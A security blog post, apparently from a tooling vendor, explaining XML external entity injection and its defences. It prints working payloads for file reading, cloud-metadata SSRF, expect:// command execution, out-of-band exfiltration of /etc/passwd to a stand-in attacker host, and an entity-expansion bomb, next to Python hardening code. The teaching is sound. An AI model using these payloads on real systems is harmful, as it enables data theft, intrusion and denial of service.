How to find and fix XML entity vulnerabilities
Michael Sherman
September 7, 2022
XML is a human-readable text format used to transport and store structured data. Tags and data structures are defined by users in self-describing documents that are universally parsable by any XML tool, giving developers a highly configurable mechanism for data representation.
To build on XML’s limited base syntax, an author can define the structure and acceptable content of a document’s data using a document type definition (DTD). The DTD enables users to define a document’s valid data and describe data in one location for reuse throughout the document. A general entity is declared in the DTD, and then referenced in the document body by adding an ampersand (&) before its name and a semicolon (;) after.
You can declare an entity in the document's own DTD (its internal subset):
<!DOCTYPE person [
  <!ENTITY name "Taylor Gray">
]>
<person><name>&name;</name></person>
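To see the substitution a parser performs, here is a minimal sketch using Python's standard-library xml.etree.ElementTree, which expands entities declared in a document's internal DTD. The document string is a complete version of the example above; nothing here is specific to any particular application.

```python
import xml.etree.ElementTree as ET

# A complete version of the internal-entity example above.
DOCUMENT = """<!DOCTYPE person [
  <!ENTITY name "Taylor Gray">
]>
<person><name>&name;</name></person>"""

root = ET.fromstring(DOCUMENT)
# The parser has replaced the &name; reference with the entity's value.
print(root.find("name").text)  # Taylor Gray
```

This substitution is exactly what XXE abuses: if the entity's value comes from an external file or URL instead of a literal string, the parser inserts whatever that resource contains.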
Alternatively, you can declare entities in an external DTD by referencing a file path or URL:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE person SYSTEM "person.dtd">
<person>
  <name>&name;</name>
</person>
The person.dtd file contains:
<!ENTITY name "Taylor Gray">
Combined with XML’s simple syntax and the uniformity of most parsers, this capability makes it relatively simple for attackers to perform an attack called XML external entity (XXE) injection. In this post, we’re going to take a close look at XXE and explore ways to prevent it.
Why XXE represents a security risk
XXE injection attacks let attackers take advantage of external entity declarations to gain access to files or infrastructure on their target server or network. This can include sensitive personal information, business logic, and credentials.
In serious cases, attackers can carry out server-side request forgery (SSRF), which makes the vulnerable server send requests on their behalf to other systems on the target's network and may enable them to execute code remotely. This can let them escalate their privileges, move through the target's infrastructure to attack other unprotected components, or launch attacks against downstream networks that appear to originate from the target.
Data retrieval
The most common XXE injection vulnerability lets attackers prompt a server to disclose sensitive data or files in an HTTP response. In isolation, this gives an attacker read-only access to data, but it can reveal information useful for escalating to a more damaging attack.
For example, an attacker can send a payload to a target server to cause the target server to display a local password file:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE staffInfo
[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<staffInfo>
<username>&xxe;</username>
<email>email</email>
</staffInfo>
Encrypting sensitive data at rest can limit the damage of data retrieval: even if an attacker tricks the parser into reading a file, encrypted contents are unreadable and unusable without the key. With a symmetric algorithm such as the Advanced Encryption Standard (AES), a single secret key both encrypts and decrypts the sensitive XML-based information you store and transfer, so that key must be kept somewhere the parser cannot read.
Furthermore, disabling the XML parser’s default support for external entities is an effective mitigation strategy against this kind of attack.
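Parser options differ between languages and libraries, so treat the following as a minimal sketch rather than a drop-in fix. It assumes Python's standard library and takes the strictest route: a first pass with pyexpat rejects any document that contains a DOCTYPE declaration at all, so no entity (internal or external) can be declared, and only then does xml.etree.ElementTree build the tree. The names safe_fromstring and ForbiddenDTDError are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenDTDError(ValueError):
    """Raised when untrusted XML contains a DTD or an external entity."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it reaches <!DOCTYPE ...>, before any
    # entity inside the DTD can be declared, fetched, or expanded.
    raise ForbiddenDTDError(f"DOCTYPE {name!r} is not allowed")


def _reject_external_entity(context, base, system_id, public_id):
    # Defense in depth: never resolve an external entity reference.
    raise ForbiddenDTDError(f"external entity {system_id!r} is not allowed")


def safe_fromstring(data):
    """Parse untrusted XML only if it contains no DTD at all."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.ExternalEntityRefHandler = _reject_external_entity
    # Raises ForbiddenDTDError for a DTD, or expat.ExpatError if malformed.
    checker.Parse(data, True)
    # No DTD means no entity declarations, so the real parse is safe.
    return ET.fromstring(data)
```

Rejecting every DTD is stricter than disabling external entities alone, but most APIs that accept XML from users never need one. The third-party defusedxml package offers similar protections for Python's XML libraries, and Java's DocumentBuilderFactory can be given the feature http://apache.org/xml/features/disallow-doctype-decl for the same effect.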
Server-side request forgery
A server vulnerable to XXE injection presents an opportunity for an attacker to impersonate the server and make requests to internal resources not normally visible outside the network.
In a server-side request forgery (SSRF) attack, an attacker typically injects a URL or address pointing to a resource that only the vulnerable server can reach, such as an internal service or a cloud instance metadata endpoint, especially when user input is not properly filtered before it reaches the XML parser. From there, they may obtain credentials and gain administrative privileges within their target's network:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE userInfo
[
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data">
]>
<userInfo>
<username>&xxe;</username>
<email>email</email>
</userInfo>
If the attacker successfully gains administrative privileges, they can impersonate the server to probe their target’s network for additional vulnerabilities. They may even be able to remotely execute code and propagate further attacks.
There are a few remedies that significantly improve your application’s resilience to this kind of attack:
Block all unauthorized incoming user requests to internal resources and confidential addresses.
Consider implementing a comprehensive blocklist containing possible malicious addresses and URLs that may pose a threat to your web infrastructure.
Adopt intelligent static analysis tools (such as Snyk Code) capable of testing your code for vulnerabilities and security loopholes.
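The first two remedies above can be sketched as an outbound URL check. This is a minimal sketch, assuming Python's standard library and an application that only ever needs to fetch public http(s) resources; is_allowed_url and its helpers are hypothetical names. It rejects other schemes (such as file:// or expect://) and any URL whose host is, or resolves to, a private, loopback, link-local, or otherwise reserved address, which covers the 169.254.169.254 metadata endpoint used above.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumption: the application only ever needs plain web requests.
ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(hostname):
    """Return every IP address the host name currently resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def is_internal(address):
    """True for private, loopback, link-local, and other non-public ranges."""
    # Drop any IPv6 zone ID (e.g. "fe80::1%eth0") before parsing.
    ip = ipaddress.ip_address(address.split("%", 1)[0])
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_allowed_url(url, resolver=resolve_host):
    """Reject non-HTTP(S) schemes and URLs that point at internal addresses."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.hostname:
        return False
    try:
        # The host is already an IP literal, e.g. 169.254.169.254 or [::1].
        addresses = {str(ipaddress.ip_address(parsed.hostname))}
    except ValueError:
        try:
            addresses = resolver(parsed.hostname)
        except OSError:
            return False  # unresolvable hosts are refused
    return bool(addresses) and not any(is_internal(a) for a in addresses)
```

Because the check resolves the host separately from the request that follows, a production version would also need to connect to the exact address it checked, or an attacker could exploit DNS rebinding. Where possible, an allowlist of known destinations is stronger than blocking ranges.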
Remote code execution
An attacker can use XXE injection for remote code execution (RCE) on a target server.
For example, if a PHP-powered website or application has the Expect extension enabled, an attacker can declare an entity that uses the expect:// wrapper to execute commands remotely:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE userInfo
[
<!ENTITY xxe SYSTEM "expect://ifconfig">
]>
<userInfo>
<username>&xxe;</username>
<email>email</email>
</userInfo>
The ifconfig command in this example returns the server's network configuration when the XML parser evaluates the xxe entity.
We can prevent this kind of RCE by disabling protocol wrappers we don't need, such as the expect:// wrapper that the PHP Expect extension provides, in our websites and web apps.
However, even when the server returns no direct response containing entity values, an attacker can use blind XXE techniques instead.
Blind XXE attacks
In some cases, input validation or a hardened XML parser blocks regular entities in the body of an XML document. An attacker may bypass this restriction by using parameter entities, which can only be referenced within the DTD. A parameter entity is declared by placing a percent sign followed by whitespace (% ) before its name, and is referenced by adding a percent sign (%) before its name and a semicolon (;) after.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo
[
<!ENTITY % xxe SYSTEM "http://evil-attacker.com"> %xxe;
]>
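In this code, the parser resolves %xxe; by fetching the attacker's URL, so the targeted server performs a DNS lookup of the attacker's domain and sends an HTTP request to the attacker's server. Even though no data comes back in the response, that incoming traffic confirms to the attacker that the target is vulnerable to blind XXE.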
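When reviewing suspicious uploads or logged request bodies, it can help to see exactly which entities a document declares before any application code touches it. A minimal sketch, assuming Python's standard-library pyexpat module: the hypothetical list_entity_declarations function records every declaration, including the flag that marks parameter entities. The expat library performs no network or file I/O of its own, so this inspection does not trigger the request the payload is designed to cause.

```python
from xml.parsers import expat


def list_entity_declarations(data):
    """Return (name, is_parameter, value, system_id) for every entity the
    document's DTD declares. Nothing is fetched: pyexpat only reports the
    declarations and never resolves external entities on its own."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id,
                       public_id, notation_name):
        # value is None for external entities; system_id is None for internal ones.
        found.append((name, bool(is_parameter), value, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        # Attack payloads are often fragments (for example, a DOCTYPE with no
        # root element); keep the declarations seen before the error.
        pass
    return found


payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo
[
<!ENTITY % xxe SYSTEM "http://evil-attacker.com"> %xxe;
]>"""
for name, is_parameter, value, system_id in list_entity_declarations(payload):
    kind = "parameter" if is_parameter else "general"
    print(f"{kind} entity {name!r}: value={value!r}, system_id={system_id!r}")
```

An auditing aid like this is not a defense by itself; it simply makes parameter entities and external system identifiers easy to spot.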
Error-based information disclosure
Our server is vulnerable to blind XXE injection methods if an attacker can retrieve valuable data by examining the error messages our server emits.
For example, this payload coerces our server into disclosing the contents of the /etc/passwd file in its error message:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo
[
<!ENTITY % badfile SYSTEM "file:///etc/passwd">
<!ENTITY % wrapper "<!ENTITY &#x25; induce SYSTEM 'file:///nosuchfileexists/%badfile;'>">
%wrapper;
%induce;
]>
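This payload defines three parameter entities: badfile, populated by the contents of the /etc/passwd file; wrapper, whose value is the declaration of a new parameter entity named induce; and induce itself, which points to a path that triggers an error message. Because the XML specification does not allow parameter entity references inside markup declarations in a document's internal DTD subset, attackers typically serve declarations like these from an external DTD, as in the out-of-band technique below.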
The value of the wrapper entity is itself a declaration of the induce entity, whose system identifier is a valid but nonexistent path containing the value of the badfile parameter entity. When wrapper is referenced, the parser processes that text and declares induce dynamically.
Finally, when the parser encounters the induce entity, it tries to load the file and fails, producing an error message stating that a file whose name equals the value of badfile doesn't exist under the nosuchfileexists path. Since badfile holds the contents of /etc/passwd, an application that returns parser errors to the client displays those contents to the attacker.
A robust error-handling strategy can reduce our app's exposure to error-based information disclosure. This strategy may include limiting the length and scope of the error messages that the server sends to the client. By returning a custom message body and HTTP status code, we avoid verbose, automatically generated error messages, which essentially provide free reconnaissance for attackers.
We need to clearly define error messages for expected scenarios, such as the FileNotFound exception in our example server. We also need to specify appropriate error messages for edge cases, which usually requires testing our code.
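A minimal sketch of that approach, assuming a Python service that parses request bodies with xml.etree.ElementTree; handle_xml_body, the logger name, and the response wording are hypothetical. The parser's detailed message goes only to the server-side log, while the client receives a fixed status code and message that cannot echo file contents or paths.

```python
import logging
import xml.etree.ElementTree as ET

logger = logging.getLogger("xml_api")  # hypothetical logger name

# Fixed, deliberately vague responses (hypothetical wording).
BAD_REQUEST = (400, "The request body could not be processed.")
SERVER_ERROR = (500, "Internal server error.")


def handle_xml_body(body):
    """Parse an XML request body and return an (HTTP status, message) pair.

    Parser details go only to the server-side log; the client always gets a
    short, fixed message that cannot echo file contents, paths, or entities.
    """
    try:
        ET.fromstring(body)
    except ET.ParseError as exc:
        # Expected failure: malformed or rejected XML.
        logger.warning("Rejected XML body: %s", exc)
        return BAD_REQUEST
    except Exception:
        # Anything else is unexpected; log the traceback, reveal nothing.
        logger.exception("Unexpected error while handling XML body")
        return SERVER_ERROR
    return (200, "Document accepted.")
```

In a real service, whatever web framework is in use would send these pairs as the response; the design point is that the error text is chosen by the application and never copied from the parser.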
Out-of-band exfiltration
An out-of-band attack is used to exfiltrate data along a different channel than the one used to send the attack. This type of attack usually involves directing the target server to make a request to an address at which the attacker hosts a malicious external DTD.
First, the attacker sends a payload that makes the target server load a malicious external DTD, such as:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://evilattacker.com/corrupted.dtd">
%xxe;
]>
The corrupted.dtd file on the attacker's server contains:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % badfile SYSTEM "file:///etc/passwd">
<!ENTITY % deval "<!ENTITY &#x25; revealinfo SYSTEM 'http://evilattacker.com/?x=%badfile;'>">
%deval;
%revealinfo;
When the deval entity is referenced, the parser processes its value and dynamically declares the revealinfo entity. When revealinfo is then referenced, the parser resolves it by sending an HTTP request to the attacker's server with the value of badfile (the contents of /etc/passwd) embedded in the query string.
Other vectors
Other common vectors for XXE attacks include:
File uploads, such as .config files
Text input fields, especially HTML text and textarea fields, which may have limited input validation rules
XML-based technologies, such as RSS feeds and APIs
XML-based files, particularly common formats like SVG images
For example, an attacker can upload an SVG image whose text element references a deeply nested entity to trigger an XML bomb (sometimes called a "billion laughs") attack:
<svg width="128px" height="128px" xmlns="http://www.evilattacker.com/svg" xmlns:xlink="http://www.evilattacker.com/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&a4;</text>
</svg>
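For that reference to expand, the file must also carry a DTD declaring a4 and the entities nested inside it. The entity structure of such a payload might look something like this: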
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ELEMENT bin (#PCDATA)>
  <!ENTITY a0 "garbage">
  <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<bin>&a4;</bin>
The parser reads the entity declarations in the DTD but doesn't expand them right away. It then reads the document body and encounters the bin element, whose content references the a4 entity. To produce that content, it must expand the ten references to a3 inside a4, each of which requires expanding ten references to a2, and so on all the way down to a0.
The final content of the bin element is the fully expanded a4 entity: ten thousand copies of "garbage", or 70,000 characters. Each additional level multiplies that size by ten, so a chain of ten levels (a0 through a9) expands to about seven billion characters, several gigabytes of text, and every level beyond that multiplies it by ten again. A payload like this typically causes an out-of-memory error for the server attempting to parse the SVG file, and a denial of service for our users.
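The arithmetic behind that growth is simple: with ten references per level, the top entity of an n-level chain expands to 10^n copies of a0. A small helper (hypothetical, for illustration only) makes the numbers concrete for the payload above and for a deeper chain built the same way.

```python
def expanded_length(levels, refs_per_level, base_text):
    """Number of characters produced by fully expanding the top entity of a
    chain like a0 ... aN, where a0 holds base_text and every higher entity
    holds refs_per_level references to the entity one level below."""
    return len(base_text) * refs_per_level ** levels


# The payload above: a0 = "garbage" (7 characters), four nested levels (a1 to a4).
print(expanded_length(4, 10, "garbage"))  # 70000
# The same pattern continued to a9: nine nested levels.
print(expanded_length(9, 10, "garbage"))  # 7000000000
```

At one byte per character, the deeper chain is roughly 7 GB of text produced from a document well under a kilobyte long, which is why limiting entity expansion (or rejecting DTDs outright) matters more than limiting request size.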
Setting memory and other resource usage limits for request processing can prevent many types of denial-of-service (DoS) attacks, since they generally rely on overwhelming a server's capacity.
Universally applicable security practices
Disable support for external entities
Disallowing external entities and user-defined DTDs is often enough to mitigate many types of XXE injection attacks, and most tools provide single-line commands to achieve this.
Use a web application firewall (WAF)
Web application firewalls (WAFs) are great tools in combating XXE attacks generally, as they inspect HTTP traffic for potentially malicious content and apply filtering rules to protect our web applications.
Implement zero trust security
The trust relationship between your web applications and external or third-party services (such as message brokers and user authentication platforms) can be exploited to launch an SSRF attack on your server infrastructure. Services within your network should therefore be allowed to access only the resources they need to function properly.
We should make sure to appropriately isolate logs and sensitive data, and implement strong processes to regularly audit access privileges for all users — both human and programmatic. This also makes security maintenance easier to manage in the long term.
Always run automated XXE vulnerability scans and testing
Automatic XXE vulnerability scans can help identify and address vulnerabilities in your infrastructure before an attacker exploits them. A comprehensive and intelligent detection system should also offer recommendations for how to further secure the system.
Keep your security patches up to date
It's important that our systems have up-to-date patches from trusted security providers. These may include security driver updates and denial-of-service (DoS) protection patches. For the latest on open source vulnerabilities, we recommend using Snyk Open Source, which is powered by the comprehensive, accurate, and timely Snyk Vulnerability Database.
Reduce risks with Snyk protection capabilities
Third-party libraries are sometimes vulnerable to exploitation, which exposes your application to attackers. To further boost your application's defenses, we suggest using Snyk OSS to scan each third-party library integrated into your application.
You can also take advantage of Snyk Code to identify and catch potential security vulnerabilities before they are exploited.
Final thoughts on XML security
XML is a versatile and powerful tool for data transport, even more so because it lets us dynamically use linked external resources. However, these same characteristics make it a popular target for malicious actors. To properly prevent and mitigate the associated risks, it's vital to understand the vulnerabilities XML processing can introduce.
Improperly sanitized user inputs, overly verbose error handling, and weakly configured access privileges open the door for attackers to use XML external entity (XXE) injection attacks to compromise our systems. An effective way to fix these vulnerabilities is to validate and filter user input and uploads and, in most cases, to simply remove functionality like external DTD processing or PHP protocol wrappers.
Error messages are most appropriate when they communicate minimal information to the user. For example, if a user fails a login attempt, it’s not necessary to tell them whether it’s their password or username that didn’t pass.
We can also implement WAFs and DoS protections or use a service provider that offers these features. And if an attacker does breach security, they should encounter only encrypted data and a network of zero-trust services.